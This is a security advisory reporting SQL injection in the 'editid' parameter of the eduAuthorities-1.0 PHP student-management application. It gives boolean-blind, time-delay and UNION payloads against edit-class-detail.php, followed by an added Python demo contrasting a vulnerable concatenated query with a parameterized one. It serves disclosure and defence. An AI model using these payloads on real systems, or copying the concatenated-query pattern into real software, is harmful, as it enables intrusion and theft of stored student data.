eduAuthorities-1.0 Multiple-SQLi

2024.08.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## Titles: eduAuthorities-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 07/29/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `editid` parameter appears to be vulnerable to SQL injection attacks. The payloads `15750083 or 4189=04189` and `58006253 or 7709=7710` were each submitted in the `editid` parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Additionally, the payload `(select*from(select(sleep(20)))a)` was submitted in the `editid` parameter. The application took 20011 milliseconds to respond to the request, compared with 3 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The attacker can get all information from the system by using this vulnerability!

STATUS: HIGH- Vulnerability

[+]Exploits:
- SQLi Multiple:

```mysql
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488 OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)# UiVZfrom(select(sleep(3)))a)

    Type: UNION query
    Title: MySQL UNION query (random number) - 3 columns
    Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962 UNION ALL SELECT 8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)
---
```

## Reproduce:
[href](https://www.patreon.com/posts/eduauthorities-1-109562178)

## More:
[href](https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)

## Time spent:
00:37:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
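
The boolean probe pair from the Description, run against a concatenated lookup and a validated, parameterized one, to show why the two responses differ only when the value reaches the SQL text. This is an added example, not part of the original advisory or the application's code; SQLite stands in for MySQL, and the `classes` table and all function names are assumptions.

```python
import re
import sqlite3

# Probe pair quoted in the advisory's Description.
TRUE_PROBE = "15750083 or 4189=04189"
FALSE_PROBE = "58006253 or 7709=7710"


def make_db():
    # Constructed stand-in schema; the application's real tables are not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE classes (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO classes VALUES (?, ?)",
                   [(1, "Class A"), (2, "Class B")])
    return db


def lookup_concatenated(db, editid):
    # Vulnerable pattern: the request value becomes part of the SQL text,
    # so "or 4189=04189" is parsed as a second condition.
    sql = "SELECT id, name FROM classes WHERE id = " + editid
    return db.execute(sql).fetchall()


def lookup_parameterized(db, editid):
    # Hardened pattern: accept only a short decimal id, then bind it as data.
    if not re.fullmatch(r"[0-9]{1,9}", editid):
        return []
    sql = "SELECT id, name FROM classes WHERE id = ?"
    return db.execute(sql, (int(editid),)).fetchall()


def response_sizes(lookup):
    # Row counts for a legitimate id, the always-true probe, the always-false probe.
    db = make_db()
    return [len(lookup(db, value)) for value in ("1", TRUE_PROBE, FALSE_PROBE)]


if __name__ == "__main__":
    print("concatenated :", response_sizes(lookup_concatenated))
    print("parameterized:", response_sizes(lookup_parameterized))
```

With the concatenated query the true and false probes return different row counts, which is the response difference the scanner keyed on; with validation and binding both probes return nothing.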



Copyright 2024, cxsecurity.com

 
